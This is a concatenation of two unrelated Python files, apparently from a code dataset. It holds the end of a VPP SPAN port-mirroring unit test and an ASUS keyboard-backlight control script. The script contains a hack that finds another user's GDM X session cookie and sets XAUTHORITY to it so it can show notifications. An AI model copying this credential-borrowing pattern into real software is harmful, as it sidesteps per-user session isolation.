self.sub_if.sw_if_index, self.pg2.sw_if_index, state=0, is_l2=1)
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=0)
self.verify_capture(pg0_pkts + pg1_pkts, pg2_pkts)
def test_l2_bcast_mirror(self):
""" SPAN l2 broadcast mirror """
self.sub_if.admin_up()
self.bridge(self.pg2.sw_if_index)
# Create bi-directional cross-connects between pg0 and pg1
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.sub_if.sw_if_index, bd_id=99, enable=1)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg1.sw_if_index, bd_id=99, enable=1)
# Create incoming packet streams for packet-generator interfaces
pg0_pkts = self.create_stream(
self.pg0, self.pg_if_packet_sizes, do_dot1=True, bcast=True)
self.pg0.add_stream(pg0_pkts)
pg1_pkts = self.create_stream(
self.pg1, self.pg_if_packet_sizes, do_dot1=False, bcast=True)
self.pg1.add_stream(pg1_pkts)
# Enable SPAN on pg0 (mirrored to pg2)
self.vapi.sw_interface_span_enable_disable(
self.sub_if.sw_if_index, self.pg2.sw_if_index, is_l2=1, state=3)
self.logger.info(self.vapi.ppcli("show interface span"))
# Enable packet capturing and start packet sending
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
# Verify packets outgoing packet streams on mirrored interface (pg2)
pg0_expected = len(pg1_pkts)
pg1_expected = len(pg0_pkts)
pg2_expected = pg0_expected + pg1_expected
pg0_pkts = self.pg0.get_capture(pg0_expected)
pg1_pkts = self.pg1.get_capture(pg1_expected)
pg2_pkts = self.pg2.get_capture(pg2_expected)
self.bridge(self.pg2.sw_if_index, is_add=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.sub_if.sw_if_index, bd_id=99, enable=0)
self.vapi.sw_interface_set_l2_bridge(
rx_sw_if_index=self.pg1.sw_if_index, bd_id=99, enable=0)
# Disable SPAN on pg0 (mirrored to pg2)
self.vapi.sw_interface_span_enable_disable(
self.sub_if.sw_if_index, self.pg2.sw_if_index, state=0, is_l2=1)
self.verify_capture(pg0_pkts + pg1_pkts, pg2_pkts)
if __name__ == '__main__':
unittest.main(testRunner=VppTestRunner)
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""Adds the keyboard backlight support for ASUS laptops."""
__version__ = "0.1"
__author__ = "Fabien Loison"
__copyright__ = "Copyright © 2010 Fabien LOISON"
__website__ = "https://github.com/flozz/asus-keyboard-backlight"
import os
import sys
#Export the display variable if not set
if not "DISPLAY" in os.environ:
DISPLAY = False
os.putenv("DISPLAY", ":0.0")
#Hack to retrieve the X session cookie of the user.
#Only works for those that uses GDM. May doesn't work if there is
#more than one user cookie in the folder (gdm excluded).
if os.path.isdir("/var/run/gdm/"):
try:
xcookie_dirs = os.listdir("/var/run/gdm/")
except OSError:
pass
else:
for xcookie_dir in xcookie_dirs:
if xcookie_dir[:9] == "auth-for-" and xcookie_dir[9:12] != "gdm":
os.putenv(
"XAUTHORITY",
"/var/run/gdm/%s/database" % xcookie_dir,
)
DISPLAY = True
break
else:
DISPLAY = True
if DISPLAY:
try:
import pynotify
NOTIFY = True
except ImportError:
NOTIFY = False
else:
NOTIFY = False
MAX_BRIGHTNESS_FILE = "/sys/devices/platform/asus_laptop/leds/asus::kbd_backlight/max_brightness"
BRIGHTNESS_FILE = "/sys/devices/platform/asus_laptop/leds/asus::kbd_backlight/brightness"
BRIGHTNESS_BAK_FILE = "/var/lib/asus-kbd-backlight/brightness"
BRIGHTNESS_BAK_DIR = "/var/lib/asus-kbd-backlight/"
MAX_BRIGHTNESS = 3
BRIGHTNESS = 1
BRIGHTNESS_ICONS = [
"notification-keyboard-brightness-full",
"notification-keyboard-brightness-high",
"notification-keyboard-brightness-medium",
"notification-keyboard-brightness-low",
"notification-keyboard-brightness-off",
]
def get_max_brightness():
"""Get the max brightness"""
global MAX_BRIGHTNESS
if os.path.isfile(MAX_BRIGHTNESS_FILE):
#Read file
file_ = open(MAX_BRIGHTNESS_FILE, "r")
max_brightness = file_.read()
file_.close()
#Extract info
max_brightness = max_brightness.replace("\n", "")
if max_brightness.isdigit():
max_brightness = int(max_brightness)
if max_brightness >= 128:
max_brightness = max_brightness - 128
MAX_BRIGHTNESS = max_brightness
def get_brightness():
"""Get the current brightness"""
global BRIGHTNESS
if os.path.isfile(BRIGHTNESS_FILE):
#Read file
file_ = open(BRIGHTNESS_FILE, "r")
brightness = file_.read()
file_.close()
#Extract info
brightness = brightness.replace("\n", "")
if brightness.isdigit():
brightness = int(brightness)
if brightness >= 0 and brightness <= MAX_BRIGHTNESS:
BRIGHTNESS = brightness
elif brightness >= 128 and brightness <= MAX_BRIGHTNESS + 128:
BRIGHTNESS = brightness - 128
def set_brightness(value):
"""Set the brightness to <value>
Argument:
* value -- an integer number between 0 and MAX_BRIGHTNESS
"""
#Set the brightness
if os.path.isfile(BRIGHTNESS_FILE):
try:
file_ = open(BRIGHTNESS_FILE, "w")
file_.write(str(value))
except IOError:
pass
else:
file_.close()
#Save the bak file
if not os.path.isdir(BRIGHTNESS_BAK_DIR):
try:
os.makedirs(BRIGHTNESS_BAK_DIR)
except OSError:
pass
try:
file_ = open(BRIGHTNESS_BAK_FILE, "w")
file_.write(str(value))
except IOError:
pass
else:
file_.close()
def notify():
"""Display an OSD"""
#Set the icon
icon_index = int((MAX_BRIGHTNESS - BRIGHTNESS) * (len(BRIGHTNESS_ICONS) - 1) / MAX_BRIGHTNESS)
#Calculate the %
value = BRIGHTNESS * 100 / MAX_BRIGHTNESS
#Notify
notification = pynotify.Notification(
"Brightness",
"",
BRIGHTNESS_ICONS[icon_index],
)
notification.set_hint_int32("value", value)
notification.set_hint_string("x-canonical-private-synchronous", "")
notification.show()
if len(sys.argv) == 2 and sys.argv[1] in ("up", "down"):
#Get informations
get_max_brightness()
get_brightness()
#Calculate the new brightness
if sys.argv[1] == "up":
BRIGHTNESS += 1
if BRIGHTNESS > MAX_BRIGHTNESS:
BRIGHTNESS = MAX_BRIGHTNESS
else:
BRIGHTNESS -= 1
if BRIGHTNESS < 0:
BRIGHTNESS = 0
#Set the new_brightness
set_brightness(BRIGHTNESS)
#Notify
if NOTIFY:
notify()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.